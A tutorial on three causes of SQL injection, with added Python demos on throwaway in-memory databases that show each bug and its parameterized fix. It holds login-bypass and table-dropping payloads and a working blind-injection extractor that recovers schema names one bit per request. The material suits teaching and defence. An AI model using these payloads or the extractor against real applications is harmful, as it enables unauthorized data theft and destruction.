Reason 1: Incorrectly filtered escape characters
In this case the developer fails to filter escape characters (such as the single quote) out of the input and passes it straight into the SQL statement. This is what makes the statement injectable.
Consider this code:
statement = "SELECT * FROM `users` WHERE `name` = '" + userName + "';"
This code looks up the username in the database. Because the input is spliced into the string, an attacker can supply SQL of his own instead of a name. For example:
' or 1=1
If he enters the text above instead of a username, the SQL statement becomes:
SELECT * FROM `users` WHERE `name` = '' OR 1=1';
Note the trailing quote that the code appends after the input: it is now unmatched, so this exact payload produces a syntax error rather than a result. That is why the next step is needed.
He can use an SQL comment to cut off the rest of the query (the comment runs to the end of the line, so the quote and semicolon the code appends are ignored):
' or 1=1 --
so the query becomes:
SELECT * FROM `users` WHERE `name` = '' OR 1=1 -- ;
Here `name` = '' is false, but 1=1 is always true, and the two conditions are joined with OR, so the WHERE clause is satisfied by every row. The query returns all users and the login check is bypassed.
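To see the bypass end to end, here is an added example (not code from the original page) in Python with the standard sqlite3 module. The `users` table and its rows are constructed for the demo; lookup_vulnerable builds the statement exactly as above, and lookup_safe shows the fix, a parameterized query, where the driver sends the value separately from the SQL text.

```python
import sqlite3


def make_db():
    """Constructed sample database for the demo (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE `users` (`name` TEXT, `password` TEXT)")
    conn.execute("INSERT INTO `users` VALUES ('admin', 's3cret'), ('bob', 'hunter2')")
    return conn


def lookup_vulnerable(conn, user_name):
    """The page's pattern: the input is concatenated straight into the statement."""
    statement = "SELECT * FROM `users` WHERE `name` = '" + user_name + "';"
    return conn.execute(statement).fetchall()


def lookup_safe(conn, user_name):
    """Parameterized query: the value is bound by the driver, so quotes and
    comment sequences in user_name can never change the statement's structure."""
    return conn.execute("SELECT * FROM `users` WHERE `name` = ?", (user_name,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR 1=1 -- "
    print(lookup_vulnerable(conn, payload))  # every row: the login check is bypassed
    print(lookup_safe(conn, payload))        # []: no user is literally named that
    print(lookup_safe(conn, "bob"))          # [('bob', 'hunter2')]: normal lookups still work
```

The safe version does not strip or escape anything; the point is that binding parameters keeps data and code apart, so no filtering step is needed at all.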
Reason 2: Incorrect type handling
When the developer does not check the data type of the input, a numeric field becomes an injection point as well.
Let us consider this query.
Statement = "Select * from `userid` where `id`=" + inputId + ";";
Here `id` is a numeric column, so the value is not wrapped in quotes. But inputId is concatenated in without any type check, so the attacker can supply any text, not just a number.
For example, if he enters
1; drop table `userid`;
the query becomes
Select * from `userid` where `id`=1; drop table `userid`;
The second statement only runs if the application's database driver or connection allows more than one statement per call (many do not by default), but the injection itself is there either way.
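An added example (not from the page) that shows the stacked-statement drop and the fix, in Python with sqlite3. Because sqlite3's execute() refuses more than one statement per call, the vulnerable function uses executescript() to stand in for a driver or connection that allows stacked statements; that is an assumption of the demo. The `userid` table and its rows are constructed here.

```python
import sqlite3


def make_db():
    """Constructed sample table for the demo (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE `userid` (`id` INTEGER, `name` TEXT)")
    conn.execute("INSERT INTO `userid` VALUES (1, 'alice'), (2, 'bob')")
    return conn


def table_exists(conn, name):
    """True if a table with this name is still present in the schema."""
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row[0] == 1


def lookup_vulnerable(conn, input_id):
    """The page's pattern: the id is concatenated in with no type check.
    executescript() models a driver that accepts stacked statements
    (assumption of the demo; sqlite3's execute() would reject them)."""
    statement = "SELECT * FROM `userid` WHERE `id`=" + input_id + ";"
    conn.executescript(statement)


def validate_id(input_id):
    """Return the id as an int, or None if the input is not a whole number."""
    try:
        return int(input_id)
    except (TypeError, ValueError):
        return None


def lookup_safe(conn, input_id):
    """Type-check first, then bind: the driver sends an integer, never SQL text."""
    numeric_id = validate_id(input_id)
    if numeric_id is None:
        raise ValueError("id must be an integer")
    return conn.execute("SELECT * FROM `userid` WHERE `id` = ?", (numeric_id,)).fetchall()


if __name__ == "__main__":
    payload = "1; drop table `userid`;"
    conn = make_db()
    lookup_vulnerable(conn, payload)
    print("table survives vulnerable lookup:", table_exists(conn, "userid"))  # False
    conn = make_db()
    try:
        lookup_safe(conn, payload)
    except ValueError as err:
        print("safe lookup rejected input:", err)
    print("table survives safe lookup:", table_exists(conn, "userid"))  # True
```

Even without stacked statements, an unquoted numeric field accepts anything that parses as an expression, so the type check and the bound parameter belong together: the first rejects garbage early, the second guarantees that whatever reaches the database is a value and not SQL.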
Reason 3: Blind SQL injection (conditional response)
Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injected query are not shown to the attacker.
The vulnerable page may not display data at all, but it renders differently depending on whether a logical condition injected into the page's legitimate SQL statement is true or false.
This type of attack can be time-intensive because a new statement must be crafted for each bit recovered. Several tools can automate the attack once the location of the vulnerability and the target information have been established.
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='1';
will result in a normal page while
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='2';
will likely give a different result if the page is vulnerable to SQL injection.
Using this difference as a yes/no oracle, one condition per request, an attacker can enumerate table and column names and eventually extract the full contents of the database.
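An added example (not from the page) that automates the boolean oracle in Python with sqlite3. The `booklist` table and the OOk14cd row are constructed for the demo; the BlindOracle class models a page that reveals only whether the query returned a row, and extract_via_blind recovers the text value of any SQL expression one character at a time, using a binary search on the code point so that each request yields exactly one bit. The request counter makes the cost the paragraph describes concrete.

```python
import sqlite3


def make_db():
    """Constructed sample table for the demo (not the page's real site)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE `booklist` (`bookId` TEXT, `booktitle` TEXT)")
    conn.execute("INSERT INTO `booklist` VALUES ('OOk14cd', 'Applied Cryptography')")
    return conn


class BlindOracle:
    """Models the vulnerable page: the attacker never sees query output, only
    whether the page rendered normally (the query returned a row) or not."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0  # round trips so far, to make the cost visible

    def page_is_normal(self, book_id):
        self.requests += 1
        # The page's own vulnerable pattern: the id is concatenated into the SQL.
        statement = "SELECT `booktitle` FROM `booklist` WHERE `bookId` = '" + book_id + "'"
        return self.conn.execute(statement).fetchone() is not None


def extract_via_blind(oracle, base_id, expression, max_len=64):
    """Recover the text value of an SQL expression through the oracle.
    Each character is found by binary search on its code point (0..127),
    so every request reveals one bit of the character."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "unicode(substr((%s), %d, 1)) > %d" % (expression, pos, mid)
            # Inject after the known-good id; the page's code appends the
            # closing quote, so the trailing '1'='1 completes the statement.
            if oracle.page_is_normal("%s' AND %s AND '1'='1" % (base_id, cond)):
                lo = mid + 1
            else:
                hi = mid
        # Past the end of the string substr() returns '' and unicode('') is
        # NULL, so every comparison is false and the search bottoms out at 0.
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    oracle = BlindOracle(make_db())
    print(oracle.page_is_normal("OOk14cd' AND '1'='1"))  # True: normal page
    print(oracle.page_is_normal("OOk14cd' AND '1'='2"))  # False: different page
    # Enumerate the schema without ever seeing query output.
    oracle = BlindOracle(make_db())
    name = extract_via_blind(oracle, "OOk14cd",
                             "SELECT name FROM sqlite_master WHERE type='table'")
    print(name, "recovered in", oracle.requests, "requests")  # booklist recovered in 63 requests
```

Seven requests per ASCII character plus seven to detect the end of the string is the best a pure true/false oracle can do; sqlite_master is SQLite's catalog table, so the same loop pointed at information_schema or the equivalent on another engine walks the whole schema, and pointed at a data column it dumps the rows.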